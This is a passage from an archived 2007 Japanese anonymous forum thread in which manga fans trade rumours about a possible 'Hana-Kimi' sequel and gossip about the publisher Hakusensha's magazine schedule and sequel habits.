それが本当ならピザの言ってた新しい仕事って
花キモ続編って事なのか?



花ゆめの編集終わってるな…orz

127 :花と名無しさん:2007/01/21(日) 17:59:47 ID:???O
てか、ここの住人でシュガプリ連載開始当初から花キモ続編を予想してたやついたな。

128 :花と名無しさん:2007/01/21(日) 20:03:30 ID:???0
最新号買ったんだけど、どこに書いてある?

129 :花と名無しさん:2007/01/21(日) 20:11:10 ID:???0
もしかしてこれのことじゃね?サプライズ情報のとこ

425 名前:花と名無しさん[sage] 投稿日:2007/01/21(日) 17:55:59 ID:???0
某コミクスを買ったら挟まっていた広告(小冊子風数ページ)より
2007別冊花とゆめ HAPPYコミック・フェア開催中!!

(中略)

4月号(2/26発売)の見どころは…!?
付録=乙女ちっくBOOKカバー(オトメンの特製描き下ろし!!)
☆サプライズ情報!! 花とゆめ6号(2/20発売)に「オトメン」初登場!!
別花大人気シリーズ―あの名作の続編が読める!!4月号から連載再開!! (2作)
ボク月・なんジャパ人妻編

(略)

130 :花と名無しさん:2007/01/21(日) 20:42:29 ID:???0
本誌のどこに書かれてるかって訊いてるのに
コミックスの折り込み広告を出されても困ると思うの

131 :花と名無しさん:2007/01/21(日) 22:00:18 ID:???0
それ、確かに書いてあるけど、砂糖姫のことじゃないだろ。

132 :花と名無しさん:2007/01/21(日) 22:32:43 ID:???O
本誌スレのカキコには本誌に書いてあったとは書いてないから
真実は129で、花君闇末2開始がデマってことか?

133 :花と名無しさん:2007/01/22(月) 10:52:45 ID:???O
>123がどういう流れで出たレスかを確認しようと久々に本誌スレを
見に行ったら、サクっと完全スルーされていて、禿ワロタw
あまりにも悲しいから、本誌スレにそれをレスした本人が
ここに投下したんじゃ?根拠も何もない、ネタだとオモw

134 :花と名無しさん:2007/01/24(水) 09:14:43 ID:???0
ピザが日記で書いてた
花キモの事でお知らせ出来る事ってのは
文庫化だと思ったんだが…。

エムラにしつこくWジュリの続編
描かせてる白泉の事だから
花キモ続編もマジでありえそうで怖いww

135 :花と名無しさん:2007/01/24(水) 11:22:46 ID:???0
Wジュリは描かせれば売れるんだから(何故だ)なんぼでも描かせるだろ

白癬はヒット作の続編で二匹目の泥鰌を狙うのが大好きだけど
描かせてみても今ひとつなこともあるわけで(波平のオトナ然り)

136 :花と名無しさん:2007/01/24(水) 11:24:16 ID:???0
ピザの場合はどうなるかね。
花キモ信者の熱はまだ冷めてないんだろうか?
絵が劣化しててもキャラ萌え続いてればオケなのかな?

35 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)